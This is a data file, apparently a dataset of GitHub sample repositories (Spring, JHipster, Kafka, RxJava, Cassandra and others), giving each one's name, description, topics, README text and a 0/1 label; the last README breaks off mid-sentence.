full_name
stringlengths
7
104
description
stringlengths
4
725
topics
stringlengths
3
468
readme
stringlengths
13
565k
label
int64
0
1
hantsy/spring4-sandbox
Sample codes to demonstrate new features of Spring 4.x
null
spring4-sandbox =============== Sample codes for demonstrating new features of Spring 4.x. Please read the [wiki](https://github.com/hantsy/spring4-sandbox/wiki) for more details.
1
xtremebiker/jsf-spring-boot
JSF 2.3 + Spring Boot 2 sample application
null
# jsf-spring-boot JSF 2.3 + Spring Boot 2 sample application ## Instructions Build it with maven and run the war as if it was an standard jar: `java -jar target/jsf-spring-boot-1.0.0.war` It will launch a JSF and Spring powered website that you can access at http://localhost:8080/ui/hello.xhtml
1
ThomasVitale/developer-experience-java-kubernetes
Samples showing how to use different tools and patterns to improve the developer experience and optimise the inner development loop.
buildpacks cartographer cartographers carvel cloud-native java knative kubernetes paketo-buildpack skaffold telepresence tilt
# Developer Experience with Java on Kubernetes In the cloud-native world, being a developer might be challenging. The number of technologies and patterns to know can be overwhelming. This repository presents an approach based on open-source technologies and focused on improving the inner development loop and continuous delivery on Kubernetes. The end goal is delivering value continuously, quickly, and reliably. The approach works with any Java application, but we'll use Spring Boot for our examples. Some of the open-source technologies covered are: * Cloud Native Buildpacks * Knative * Tilt * Skaffold * Telepresence * Argo CD * Cartographer. For each tool/strategy there is a dedicated folder within which you'll find instructions on how to setup your environment. ## Pre-requisites Running through the examples will require you to have the following installed on your machine: * [Java 21](https://adoptium.net/en-GB/temurin/releases) * [Docker](https://www.docker.com) * [kubectl](https://kubectl.docs.kubernetes.io) * [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation) * [kapp](https://carvel.dev/kapp/docs/latest/install) To manage different versions and distributions of Java, I recommend using [SDKMAN!](https://sdkman.io). Finally, to interact with HTTP services, I recommend using [httpie](https://httpie.io).
0
auth0-samples/auth0-spring-security5-api-sample
Sample demonstrating how to secure your API using Spring Boot 2 and Spring Security 5
dx-sdk-quickstart quickstart
# Auth0 Spring Security API Samples [![CircleCI](https://circleci.com/gh/auth0-samples/auth0-spring-security5-api-sample.svg?style=svg)](https://circleci.com/gh/auth0-samples/auth0-spring-security5-api-sample) These samples demonstrate how to create an API with Spring Boot and the [Okta Spring Boot Starter](https://github.com/okta/okta-spring-boot). These samples do not demonstrate how to sign a JWT but rather assume that a user has already been authenticated by Auth0 and holds an access token for API access. For information on how to use Auth0 to authenticate users, see [the docs](https://auth0.com/docs). ## What is Auth0? Auth0 helps you to: * Add authentication with [multiple authentication sources](https://docs.auth0.com/identityproviders), either social like **Google, Facebook, Microsoft Account, LinkedIn, GitHub, Twitter, Box, Salesforce, amont others**, or enterprise identity systems like **Windows Azure AD, Google Apps, Active Directory, ADFS or any SAML Identity Provider**. * Add authentication through more traditional **[username/password databases](https://docs.auth0.com/mysql-connection-tutorial)**. * Add support for **[linking different user accounts](https://docs.auth0.com/link-accounts)** with the same user. * Support for generating signed [Json Web Tokens](https://docs.auth0.com/jwt) to call your APIs and **flow the user identity** securely. * Analytics of how, when and where users are logging in. * Pull data from other sources and add it to the user profile, through [JavaScript rules](https://docs.auth0.com/rules). ## Create a free Auth0 account 1. Go to [Auth0](https://auth0.com/signup) and click Sign Up. 2. Use Google, GitHub or Microsoft Account to login. ## Issue Reporting If you have found a bug or if you have a feature request, please report them at this repository issues section. Please do not report security vulnerabilities on the public GitHub issue tracker. The [Responsible Disclosure Program](https://auth0.com/whitehat) details the procedure for disclosing security issues. ## Author [Auth0](https://auth0.com) ## License This project is licensed under the MIT license. See the [LICENSE](LICENSE) file for more info.
1
friyiajr/BLESampleExpo
A Sample of BLE in Expo to Accompany my YouTube Video
null
null
1
RawSanj/spring-tiles-sample-app
Spring MVC - Apache Tile - AdminLTE Bootstrap template - Sample Application
adminlte apache-tiles docker spring-data-jpa spring-mvc spring-security spring-tiles-sample twitter-bootstrap
# Spring-Tiles-AdminLTE-Demo-App ### Spring MVC - Spring Data JPA - Spring Security - AdminLTE Bootstrap template - Apache Tile - Sample Application This is a demo for how to integrate Spring MCV with Apache Tiles and AdminLTE (a Bootstrap 3 based Admin Panel template). - Spring - Apache Tiles - AdminLTE - A Bootstrap template ### Tech Spring-Tiles-Sample-App uses a number of open source projects: * [Spring Framework] - Core support for dependency injection, transaction management, web applications, data access, messaging, testing and more. * [Spring Data JPA] - Spring Data JPA, part of the larger Spring Data family, makes it easy to easily implement JPA based repositories. * [Spring Security] - Spring Security is a powerful and highly customizable authentication and access-control framework. * [Apache Tiles] - A free open-sourced templating framework for modern Java applications. * [AdminLTE] - Free Premium Admin control Panel Theme based On Bootstrap 3. * [Twitter Bootstrap] - Great UI boilerplate for modern web apps. * [jQuery] - jQuery is a fast, small, and feature-rich JavaScript library. ### Installation ```sh $ git clone https://github.com/RawSanj/spring-tiles-sample-app.git ``` Run this application using embedded Jetty Server and HSQL in-memory DB Server: ```sh mvn -P dev jetty:run -Dspring.profiles.active="dev" ``` Or run this application using embedded Tomcat7 server(or Jetty) and PostgreSql DB Server: ```sh mvn -P dev tomcat7:run -Dspring.profiles.active="prod" ``` ### Run in Docker #### Run locally: Build the WAR file: ```sh $ mvn package ``` Build docker image: ```sh $ docker build . -t spring-tiles-sample-app ``` Run docker image: ```sh $ docker run -d -p 8080:8080 spring-tiles-sample-app ``` #### Run on Cloud: Try http://play-with-docker.com for running docker on browser without any local setup. Pull the docker image: ```sh $ docker pull rawsanj/spring-tiles-sample-app ``` Run the docker image: ```sh $ docker run -d -p 8080:8080 rawsanj/spring-tiles-sample-app ``` ### Tools The following tools are used to create this project : * Spring Tool Suite * Maven * Google Chrome * Git License ---- The MIT License (MIT) Copyright (c) 2015 Sanjay Rawat [//]: # [Spring Framework]: <http://projects.spring.io/spring-framework/> [Apache Tiles]: <https://tiles.apache.org/> [Spring Data JPA]: <http://projects.spring.io/spring-data-jpa/> [Spring Security]:<http://projects.spring.io/spring-security/> [AdminLTE]: <https://github.com/almasaeed2010/AdminLTE> [Twitter Bootstrap]: <http://twitter.github.com/bootstrap/> [jQuery]: <http://jquery.com>
1
guigarage/mastering-javafx-controls
This repository contains all samples of the Mastering JavaFX 8 Controls" book. You can find more information about the book at http://www.guigarage.com/javafx-book/"
null
mastering-javafx-controls ========================= This repository contains all samples of the "Mastering JavaFX 8 Controls" book. You can find more information about the book at http://www.guigarage.com/javafx-book/
0
berndruecker/flowing-retail
Sample application demonstrating an order fulfillment system decomposed into multiple independant components (e.g. microservices). Showing concrete implementation alternatives using e.g. Java, Spring Boot, Apache Kafka, Camunda, Zeebe, ...
null
# Flowing Retail This sample application demonstrates a simple order fulfillment system, decomposed into multiple independent components (like _microservices_). The repository contains code for multiple implementation alternatives to allow a broad audience to understand the code and to compare alternatives. The [table below](#alternatives) lists these alternatives. The example respects learnings from **Domain Driven Design (DDD)**, Event Driven Architecture (EDA) and **Microservices (µS)** and is designed to give you hands-on access to these topics. **Note:** The code was written in order to be explained. Hence, I favored simplified code or copy & paste over production-ready code with generic solutions. **Don't consider the coding style best practice! It is purpose-written to be easily explainable code**. You can find more information on the concepts in the [Practical Process Automation](https://processautomationbook.com/) book with O'Reilly. Flowing retail simulates a very easy order fulfillment system: ![Events and Commands](docs/workflow-in-service.png) <a name = "alternatives"></a> ## Architecture and implementation alternatives The most fundamental choice is to select the **communication mechanism**: * **[Apache Kafka](kafka/)** as event bus (could be easily changed to messaging, e.g. RabbitMQ): [](docs/architecture.png) * **[REST](rest/)** communication between Services. * This example also shows how to do **stateful resilience patterns** like **stateful retries** leveraging a workflow engine. * **[Zeebe](zeebe/)** broker doing work distribution. After the communication mechanism, the next choice is the **workflow engine**: * **Camunda 8 (aka Zeebe)** and the **programming language**: * **Java** ## Storyline Flowing retail simulates a very easy order fulfillment system. The business logic is separated into the services shown above (shown as a [context map](https://www.infoq.com/articles/ddd-contextmapping)). ### Long running services and orchestration Some services are **long running** in nature - for example: the payment service asks customers to update expired credit cards. A workflow engine is used to persist and control these long running interactions. ### Workflows live within service boundaries Note that the state machine (_or workflow engine in this case_) is a library used **within** one service. If different services need a workflow engine they can run whatever engine they want. This way it is an autonomous team decision if they want to use a framework, and which one: ![Events and Commands](docs/workflow-in-service.png) ## Links and background reading * [Practical Process Automation](https://processautomationbook.com/) book * Introduction blog post: https://blog.bernd-ruecker.com/flowing-retail-demonstrating-aspects-of-microservices-events-and-their-flow-with-concrete-source-7f3abdd40e53 * InfoQ-Writeup "Events, Flows and Long-Running Services: A Modern Approach to Workflow Automation": https://www.infoq.com/articles/events-workflow-automation
1
firatkucuk/diffie-hellman-helloworld
Sample Diffie Hellman Key Exchange" usage in Java"
null
This little Diffie-Hellman Key Exchange program implemented for learning purposes. This is how things done in Main.java: ```java // 1. ------------------------------------------------------------------ // This is Alice and Bob // Alice and Bob want to chat securely. But how? final Person alice = new Person(); final Person bob = new Person(); // ? ? // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // 2. ------------------------------------------------------------------ // Alice and Bob generate public and private keys. alice.generateKeys(); bob.generateKeys(); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // _ PUBLIC KEY _ PUBLIC KEY // _ PRIVATE KEY _ PRIVATE KEY // 3. ------------------------------------------------------------------ // Alice and Bob exchange public keys with each other. alice.receivePublicKeyFrom(bob); bob.receivePublicKeyFrom(alice); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // _ PUBLIC KEY <-------------------------> _ PUBLIC KEY // 4. ------------------------------------------------------------------ // Alice generates common secret key via using her private key and Bob's public key. // Bob generates common secret key via using his private key and Alice's public key. // Both secret keys are equal without TRANSFERRING. This is the magic of Diffie-Helman algorithm. alice.generateCommonSecretKey(); bob.generateCommonSecretKey(); // // O O // /|\ /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // _ SECRET KEY _ SECRET KEY // 5. ------------------------------------------------------------------ // Alice encrypts message using the secret key and sends to Bob alice.encryptAndSendMessage("Bob! Guess Who I am.", bob); // // O O // /|\ []--------------------------------> /|\ // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // + secret key + secret key // + message _ MESSAGE // 6. ------------------------------------------------------------------ // Bob receives the important message and decrypts with secret key. bob.whisperTheSecretMessage(); // // O ((( ((( ((( \O/ ))) // /|\ | // / \ / \ // // ALICE BOB // + public key + public key // + private key + private key // + public key + public key // + secret key + secret key // + message + message ```
1
isuperqiang/ExpandableListViewDemo
ExpandableListView 使用(A simple sample of ExpandableListView)
null
# ExpandableListViewDemo 该项目是对 ExpandableListView 使用的简单总结,包括 API 的使用和一些小技巧。 **几个要点:** * 支持点击分组后关闭其他的分组,默认是点开哪个展开哪个,各个分组互不影响; * 支持自定义分组展开和折叠的指示器,效果还是不错的; * 系统提供的简单适配器参数复杂,使用起来不方便,建议还是自己定义适配器;
1
ncbo/ncbo_rest_sample_code
Sample code that demonstrates the use of the NCBO REST services
null
# NCBO REST Sample Code Sample code that demonstrates the use of the NCBO REST services. Documentation for REST services is available at [http://data.bioontology.org/documentation](http://data.bioontology.org/documentation) Questions and bug reports can be directed to the NCBO Support List: [support@bioontology.org](mailto:support@bioontology.org) ## Community Code Examples - [RNCBO](https://github.com/muntisa/RNCBO) (uses R) - Cristian R. Munteanu (BiGCaT - [www.enanomapper.net](http://www.enanomapper.net))
1
odrotbohm/whoops-architecture
Sample code for my talk Whoops! Where did my architecture go?""
null
null
1
jhipster/jhipster-sample-app-vuejs
This is a sample application created with JHipster, with the Vue.js blueprint
null
# jhipsterSampleApplicationVue This application was generated using JHipster 8.3.0, you can find documentation and help at [https://www.jhipster.tech/documentation-archive/v8.3.0](https://www.jhipster.tech/documentation-archive/v8.3.0). ## Project Structure Node is required for generation and recommended for development. `package.json` is always generated for a better development experience with prettier, commit hooks, scripts and so on. In the project root, JHipster generates configuration files for tools like git, prettier, eslint, husky, and others that are well known and you can find references in the web. `/src/*` structure follows default Java structure. - `.yo-rc.json` - Yeoman configuration file JHipster configuration is stored in this file at `generator-jhipster` key. You may find `generator-jhipster-*` for specific blueprints configuration. - `.yo-resolve` (optional) - Yeoman conflict resolver Allows to use a specific action when conflicts are found skipping prompts for files that matches a pattern. Each line should match `[pattern] [action]` with pattern been a [Minimatch](https://github.com/isaacs/minimatch#minimatch) pattern and action been one of skip (default if omitted) or force. Lines starting with `#` are considered comments and are ignored. - `.jhipster/*.json` - JHipster entity configuration files - `npmw` - wrapper to use locally installed npm. JHipster installs Node and npm locally using the build tool by default. This wrapper makes sure npm is installed locally and uses it avoiding some differences different versions can cause. By using `./npmw` instead of the traditional `npm` you can configure a Node-less environment to develop or test your application. - `/src/main/docker` - Docker configurations for the application and services that the application depends on ## Development Before you can build this project, you must install and configure the following dependencies on your machine: 1. [Node.js](https://nodejs.org/): We use Node to run a development web server and build the project. Depending on your system, you can install Node either from source or as a pre-packaged bundle. After installing Node, you should be able to run the following command to install development tools. You will only need to run this command when dependencies change in [package.json](package.json). ``` npm install ``` We use npm scripts and [Webpack][] as our build system. Run the following commands in two separate terminals to create a blissful development experience where your browser auto-refreshes when files change on your hard drive. ``` ./mvnw npm start ``` Npm is also used to manage CSS and JavaScript dependencies used in this application. You can upgrade dependencies by specifying a newer version in [package.json](package.json). You can also run `npm update` and `npm install` to manage dependencies. Add the `help` flag on any command to see how you can use it. For example, `npm help update`. The `npm run` command will list all of the scripts available to run for this project. ### PWA Support JHipster ships with PWA (Progressive Web App) support, and it's turned off by default. One of the main components of a PWA is a service worker. The service worker initialization code is commented out by default. To enable it, uncomment the following code in `src/main/webapp/index.html`: ```html <script> if ('serviceWorker' in navigator) { navigator.serviceWorker.register('./service-worker.js').then(function () { console.log('Service Worker Registered'); }); } </script> ``` Note: [Workbox](https://developers.google.com/web/tools/workbox/) powers JHipster's service worker. It dynamically generates the `service-worker.js` file. ### Managing dependencies For example, to add [Leaflet][] library as a runtime dependency of your application, you would run following command: ``` npm install --save --save-exact leaflet ``` To benefit from TypeScript type definitions from [DefinitelyTyped][] repository in development, you would run following command: ``` npm install --save-dev --save-exact @types/leaflet ``` Then you would import the JS and CSS files specified in library's installation instructions so that [Webpack][] knows about them: Note: There are still a few other things remaining to do for Leaflet that we won't detail here. For further instructions on how to develop with JHipster, have a look at [Using JHipster in development][]. ## Building for production ### Packaging as jar To build the final jar and optimize the jhipsterSampleApplicationVue application for production, run: ``` ./mvnw -Pprod clean verify ``` This will concatenate and minify the client CSS and JavaScript files. It will also modify `index.html` so it references these new files. To ensure everything worked, run: ``` java -jar target/*.jar ``` Then navigate to [http://localhost:8080](http://localhost:8080) in your browser. Refer to [Using JHipster in production][] for more details. ### Packaging as war To package your application as a war in order to deploy it to an application server, run: ``` ./mvnw -Pprod,war clean verify ``` ### JHipster Control Center JHipster Control Center can help you manage and control your application(s). You can start a local control center server (accessible on http://localhost:7419) with: ``` docker compose -f src/main/docker/jhipster-control-center.yml up ``` ## Testing ### Client tests Unit tests are run by [Jest][]. They're located in [src/test/javascript/](src/test/javascript/) and can be run with: ``` npm test ``` UI end-to-end tests are powered by [Cypress][]. They're located in [src/test/javascript/cypress](src/test/javascript/cypress) and can be run by starting Spring Boot in one terminal (`./mvnw spring-boot:run`) and running the tests (`npm run e2e`) in a second one. #### Lighthouse audits You can execute automated [lighthouse audits][https://developers.google.com/web/tools/lighthouse/] with [cypress audits][https://github.com/mfrachet/cypress-audit] by running `npm run e2e:cypress:audits`. You should only run the audits when your application is packaged with the production profile. The lighthouse report is created in `target/cypress/lhreport.html` ### Spring Boot tests To launch your application's tests, run: ``` ./mvnw verify ``` ### Gatling Performance tests are run by [Gatling][] and written in Scala. They're located in [src/test/java/gatling/simulations](src/test/java/gatling/simulations). You can execute all Gatling tests with ``` ./mvnw gatling:test ``` ## Others ### Code quality using Sonar Sonar is used to analyse code quality. You can start a local Sonar server (accessible on http://localhost:9001) with: ``` docker compose -f src/main/docker/sonar.yml up -d ``` Note: we have turned off forced authentication redirect for UI in [src/main/docker/sonar.yml](src/main/docker/sonar.yml) for out of the box experience while trying out SonarQube, for real use cases turn it back on. You can run a Sonar analysis with using the [sonar-scanner](https://docs.sonarqube.org/display/SCAN/Analyzing+with+SonarQube+Scanner) or by using the maven plugin. Then, run a Sonar analysis: ``` ./mvnw -Pprod clean verify sonar:sonar -Dsonar.login=admin -Dsonar.password=admin ``` If you need to re-run the Sonar phase, please be sure to specify at least the `initialize` phase since Sonar properties are loaded from the sonar-project.properties file. ``` ./mvnw initialize sonar:sonar -Dsonar.login=admin -Dsonar.password=admin ``` Additionally, Instead of passing `sonar.password` and `sonar.login` as CLI arguments, these parameters can be configured from [sonar-project.properties](sonar-project.properties) as shown below: ``` sonar.login=admin sonar.password=admin ``` For more information, refer to the [Code quality page][]. ### Using Docker to simplify development (optional) You can use Docker to improve your JHipster development experience. A number of docker-compose configuration are available in the [src/main/docker](src/main/docker) folder to launch required third party services. For example, to start a mysql database in a docker container, run: ``` docker compose -f src/main/docker/mysql.yml up -d ``` To stop it and remove the container, run: ``` docker compose -f src/main/docker/mysql.yml down ``` You can also fully dockerize your application and all the services that it depends on. To achieve this, first build a docker image of your app by running: ``` npm run java:docker ``` Or build a arm64 docker image when using an arm64 processor os like MacOS with M1 processor family running: ``` npm run java:docker:arm64 ``` Then run: ``` docker compose -f src/main/docker/app.yml up -d ``` When running Docker Desktop on MacOS Big Sur or later, consider enabling experimental `Use the new Virtualization framework` for better processing performance ([disk access performance is worse](https://github.com/docker/roadmap/issues/7)). For more information refer to [Using Docker and Docker-Compose][], this page also contains information on the docker-compose sub-generator (`jhipster docker-compose`), which is able to generate docker configurations for one or several JHipster applications. ## Continuous Integration (optional) To configure CI for your project, run the ci-cd sub-generator (`jhipster ci-cd`), this will let you generate configuration files for a number of Continuous Integration systems. Consult the [Setting up Continuous Integration][] page for more information. [JHipster Homepage and latest documentation]: https://www.jhipster.tech [JHipster 8.3.0 archive]: https://www.jhipster.tech/documentation-archive/v8.3.0 [Using JHipster in development]: https://www.jhipster.tech/documentation-archive/v8.3.0/development/ [Using Docker and Docker-Compose]: https://www.jhipster.tech/documentation-archive/v8.3.0/docker-compose [Using JHipster in production]: https://www.jhipster.tech/documentation-archive/v8.3.0/production/ [Running tests page]: https://www.jhipster.tech/documentation-archive/v8.3.0/running-tests/ [Code quality page]: https://www.jhipster.tech/documentation-archive/v8.3.0/code-quality/ [Setting up Continuous Integration]: https://www.jhipster.tech/documentation-archive/v8.3.0/setting-up-ci/ [Node.js]: https://nodejs.org/ [NPM]: https://www.npmjs.com/ [Webpack]: https://webpack.github.io/ [BrowserSync]: https://www.browsersync.io/ [Jest]: https://facebook.github.io/jest/ [Cypress]: https://www.cypress.io/ [Leaflet]: https://leafletjs.com/ [DefinitelyTyped]: https://definitelytyped.org/ [Gatling]: https://gatling.io/
1
michaljemala/spring-captcha
Spring Security SimpleCaptcha integration sample
null
Spring Captcha ============== Spring Security SimpleCaptcha integration sample. It demonstrates a way how to introduce a CAPTCHA verification into the form logins. After 3 unsuccessful login attempts a CAPTCHA will required to be provided. To generate CAPTCHAs the [SimpleCaptcha library](http://simplecaptcha.sourceforge.net/) is used. How to install SimpleCaptcha to your local Maven repo ----------------------------------------------------- ```shell mvn install:install-file -Dfile=./lib/simplecaptcha-1.2.jar -DgroupId=nl.captcha -DartifactId=simplecaptcha -Dversion=1.2 -Dpackaging=jar ```
1
yongjhih/dagger2-sample
CoffeeMaker Sample
null
# CoffeeMaker Dagger2-Sample [![Build Status](https://travis-ci.org/yongjhih/dagger2-sample.svg)](https://travis-ci.org/yongjhih/dagger2-sample) ## Usage ```bash ./gradlew execute ``` ## Getting Start Main: [examples/simple/src/main/java/coffee/CoffeeApp.java](examples/simple/src/main/java/coffee/CoffeeApp.java) ```java Coffee coffee = DaggerCoffeeApp_Coffee.builder().build(); coffee.maker().brew(); ``` ``` $ ./gradlew execute ~ ~ ~ heating ~ ~ ~ => => pumping => => [_]P coffee! [_]P ``` ## See Also * Official CoffeeMaker Documentation: http://google.github.io/dagger/
1
gonzalonm/RoomDemo
Sample application using Room Persistence Library
android-application persistence sqlite
# RoomDemo Sample application using Room Persistence Library based on the following post: https://medium.com/@lalosoft/getting-started-with-room-persistence-library-8932276b4d8c ### Screenshot ![Alt text](https://github.com/gonzalonm/RoomDemo/blob/master/home.png?raw=true "Optional Title")
1
bharathish-diggavi/selenium-testng-framework
A sample framework based on Page Object Model, Selenium, TestNG using Java.
automation-testing java page-object-framework page-object-model selenium selenium-automation selenium-java selenium-testng-framework testng web-auto
selenium-testng-framework --- --- A sample framework based on Page Object Model, Selenium, TestNG using Java. This framework is based in **Page Object Model (POM).** The framework uses: 1. Java 2. Selenium 3. TestNG 4. ExtentReport 5. Log4j 6. SimpleJavaMail Steps to create test cases: ---- Let's say we want to automate Google search test. 1.Create GoogleSearchPage in **pages** package. A page class typically should contain all the elements that are present on the page and corresponding action methods. ``` public class GooglePage extends BasePage { @FindBy(name = "q") private WebElement searchinput; public GooglePage(WebDriver driver) { super(driver); } public void searchText(String key) { searchinput.sendKeys(key + Keys.ENTER); } } ``` 2.Create the test class which class the methods of GoogleSearchPage ``` @Test(testName = "Google search test", description = "Test description") public class GoogleSearchTest extends BaseTest { @Test public void googleSearchTest() { driver.get("https://www.google.co.in/"); GooglePage googlePage = PageinstancesFactory.getInstance(GooglePage.class); googlePage.searchText("abc"); Assert.assertTrue(driver.getTitle().contains("abc"), "Title doesn't contain abc : Test Failed"); } } ``` 3.Add the test class in testng.xml file under the folder `src/test/resources/suites/` ``` <suite name="Suite"> <listeners></listeners> <test thread-count="5" name="Test" parallel="classes"> <classes> <class name="example.example.tests.GoogleSearchTest" /> ``` 4.Execute the test cases by maven command `mvn clean test` --- Reproting --- The framework gives report in three ways, 1. Log - In file `logfile.log`. 2. A html report - Which is generated using extent reports, under the folder `ExtentReports`. 3. A mail report - For which the toggle `mail.sendmail` in `test.properties` should be set `true`. And all the properties such as `smtp host, port, proxy details, etc.,` should be provided correctly. --- Key Points: --- 1. The class `WebDriverContext` is responsible for maintaining the same WebDriver instance throughout the test. So whenever you require a webdriver instance which has been using for current test (In current thread) always call `WebDriverContext.getDriver()`. 2. Always use `PageinstancesFactory.getInstance(type)` to get the instance of particular Page Object. (Of course you can use `new` but it's better use a single approach across the framework. --- >For any query or suggestions please do comment or mail @ diggavibharathish@gmail.com
1
i-tanaka730/design_pattern
Design pattern sample program
null
# design_pattern ## Overview It is a sample program of design pattern. ## Requirement - Java ## Thanks This program is a modification of the program created by Hiroshi Yuki. Thank you for the great program. I became very studying. ## License (Hiroshi Yuki) Copyright (C) 2001,2004 Hiroshi Yuki. http://www.hyuki.com/dp/ hyuki@hyuki.com This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. ## License (Ikuya Tanaka) [MIT](https://github.com/i-tanaka730/design_pattern/blob/master/LICENSE) ## Author [Ikuya Tanaka](https://github.com/i-tanaka730)
1
confluentinc/training-ksql-and-streams-src
Sample solutions for the exercises of the course KSQL & Kafka Streams
null
null
1
tunjos/RxJava2-RxMarbles-Samples
RxJava 2 RxMarbles Samples
example examples java learning-rxjava rxjava rxjava2 sample samples tutorial tutorials
RxJava 2 RxMarbles Samples ============== This repository contains RxJava 2 implementations of the sample operators found in the [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles). Please download the app for a more interactive tutorial. ### Running Simply import the project using intelliJ IDEA and run the corresponding run configurations. ### Awesome Links [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles) [ReactiveX](http://reactivex.io/) [ReactiveX Operators](http://reactivex.io/documentation/operators.html) [RxMarbles](http://rxmarbles.com/) [RxJava Wiki](https://github.com/ReactiveX/RxJava/wiki) ### Dependencies [RxJava2](https://github.com/ReactiveX/RxJava) [RxJava2Extensions](https://github.com/akarnokd/RxJava2Extensions) ## [Transforming](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Transforming/src/Main.java) <img src="Transforming/operators/map.png" width="250"> <img src="Transforming/operators/flatMap.png" width="250"> <img src="Transforming/operators/buffer.png" width="250"> <img src="Transforming/operators/groupBy.png" width="250"> <img src="Transforming/operators/scan.png" width="250"> ## [Filtering](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Filtering/src/Main.java) <img src="Filtering/operators/debounce.png" width="250"> <img src="Filtering/operators/distinct.png" width="250"> <img src="Filtering/operators/distinctUntilChanged.png" width="250"> <img src="Filtering/operators/elementAt.png" width="250"> <img src="Filtering/operators/filter.png" width="250"> <img src="Filtering/operators/first.png" width="250"> <img src="Filtering/operators/last.png" width="250"> <img src="Filtering/operators/skip.png" width="250"> <img src="Filtering/operators/skipLast.png" width="250"> <img src="Filtering/operators/take.png" width="250"> <img src="Filtering/operators/takeLast.png" width="250"> <img src="Filtering/operators/ignoreElements.png" width="250"> ## [Combining](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Combining/src/Main.java) <img src="Combining/operators/startWith.png" width="250"> <img src="Combining/operators/amb.png" width="250"> <img src="Combining/operators/combineLatest.png" width="250"> <img src="Combining/operators/concat.png" width="250"> <img src="Combining/operators/merge.png" width="250"> <img src="Combining/operators/sequenceEqual.png" width="250"> <img src="Combining/operators/zip.png" width="250"> ## [Error Handling](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/ErrorHandling/src/Main.java) <img src="ErrorHandling/operators/onErrorReturn.png" width="250"> <img src="ErrorHandling/operators/onErrorResumeNext.png" width="250"> ## [Conditional](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Conditional/src/Main.java) <img src="Conditional/operators/all.png" width="250"> <img src="Conditional/operators/contains.png" width="250"> <img src="Conditional/operators/skipWhile.png" width="250"> <img src="Conditional/operators/skipUntil.png" width="250"> <img src="Conditional/operators/takeWhile.png" width="250"> <img src="Conditional/operators/takeUntil.png" width="250"> ## [Math](https://github.com/tunjos/RxJava2-RxMarbles-Samples/blob/master/Math/src/Main.java) <img src="Math/operators/average.png" width="250"> <img src="Math/operators/sum.png" width="250"> <img src="Math/operators/reduce.png" width="250"> <img src="Math/operators/count.png" width="250"> NB -------- All screenshots taken directly from the [RxMarbles Android Application](https://play.google.com/store/apps/details?id=com.moonfleet.rxmarbles). License -------- Copyright 2017 Tunji Olu-Taiwo Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
jeffreyscarpenter/reservation-service
Sample microservice implementation based on reservation data model from Cassandra: The Definitive Guide, 2nd/3rd Ed
null
# reservation-service This repository provides a sample microservice implementation based on the reservation data model from the O'Reilly book [Cassandra: The Definitive Guide, 3rd Edition](https://www.amazon.com/Cassandra-Definitive-Guide-Distributed-Scale/dp/1098115163) ![Book Cover](images/cassandra-tdg.jpg) See especially Chapter 7: "Designing Applications with Cassandra", which describes the design of the service, and Chapter 8: "Application Development with Drivers", which covers the implementation. ## Overview The goal of this project is to provide a minimally functional implementation of a microservice that uses Apache Cassandra for its data storage via the DataStax Java Driver. The Reservation Service is implemented as a RESTful service using Spring Boot and exposes it's API via Swagger. ![Reservation Service Design](images/reservation-service.png) This service leverages the [reservation schema][schema] developed in the book, based on the data model shown here: ![Reservation Schema](images/cass_05_reservation_physical.png) If you'd like to understand more about the motivation behind this design, you can access the data modeling chapter from the book for free at the [O'Reilly website][chapter]. ## Requirements This service runs on Java 11 or [12](https://jdk.java.net/12/) and uses the [DataStax Java Driver][driver]. ## <a name="runservice">Running the Reservation Service</a> The Reservation Service requires a Cassandra cluster consisting of least one node. Here are some different options for running the Reservation Service: - Option 1: Run Cassandra and the Reservation Service in Docker with `docker-compose` command. - Build the application by running `./mvnw compile` - `docker-compose up` if you want to follow the logs **OR** - `docker-compose up -d` to start all containers in detached mode. - Option 2: Running using Spring boot against a local Cassandra instance - Confirm the default JDK is version 11 or later - Download binaries for your platform from http://cassandra.apache.org/download/ - Unzip the archive, for example `tar xvf apache-cassandra-3.11.6-bin.tar.gz some-directory` - Start Cassandra by running `bin/cassandra` - Start spring-boot app by running `./mvnw spring-boot:run` ## Swagger API Once the application is running, you can access the Swagger API at `localhost:8080`. ## Running Tests The test suite for the Reservation Service uses the [Test Containers][testcontainers] project to start a Cassandra node in Docker. You'll want to shut down any infrastructure you created above under [Running the Reservation Service](#runservice). Run the test suite with the Maven `test` target: `./mvnw test` ## Exercises This repository is configured with branches that represent the start point and solution for various exercises used in an online course taught periodically with [O'Reilly Live Training][live-training]. These exercises remove some of the application code and require you to add it back in to get the service back to a functional state. There are exercises to help you learn the various ways of executing statements, such as `SimpleStatement`, `PreparedStatement`, `QueryBuilder` and the Object Mapper. Other exercises teach you how to use batches, lightweight transactions and materialized views. To work on an exercise, select the branch that represents the start point of the exercise, for example: `git checkout simple-statement`. Then search through the code and complete the `TODO` items and run the service again until the service is working. You can view the solution code for a given exercise in the `_solution` branch, for example `git checkout simple-statement-solution`. This repository was updated beginning in July 2019 to use the DataStax Java Driver Version 4.x series. Branches beginning with `old_` represent exercises from a prior version of the course and use the 2.x Driver. ## Disclaimers This service has a couple of shortcomings that would be inappropriate for a production-ready service implementation: - There is minimal data validation - There is minimal 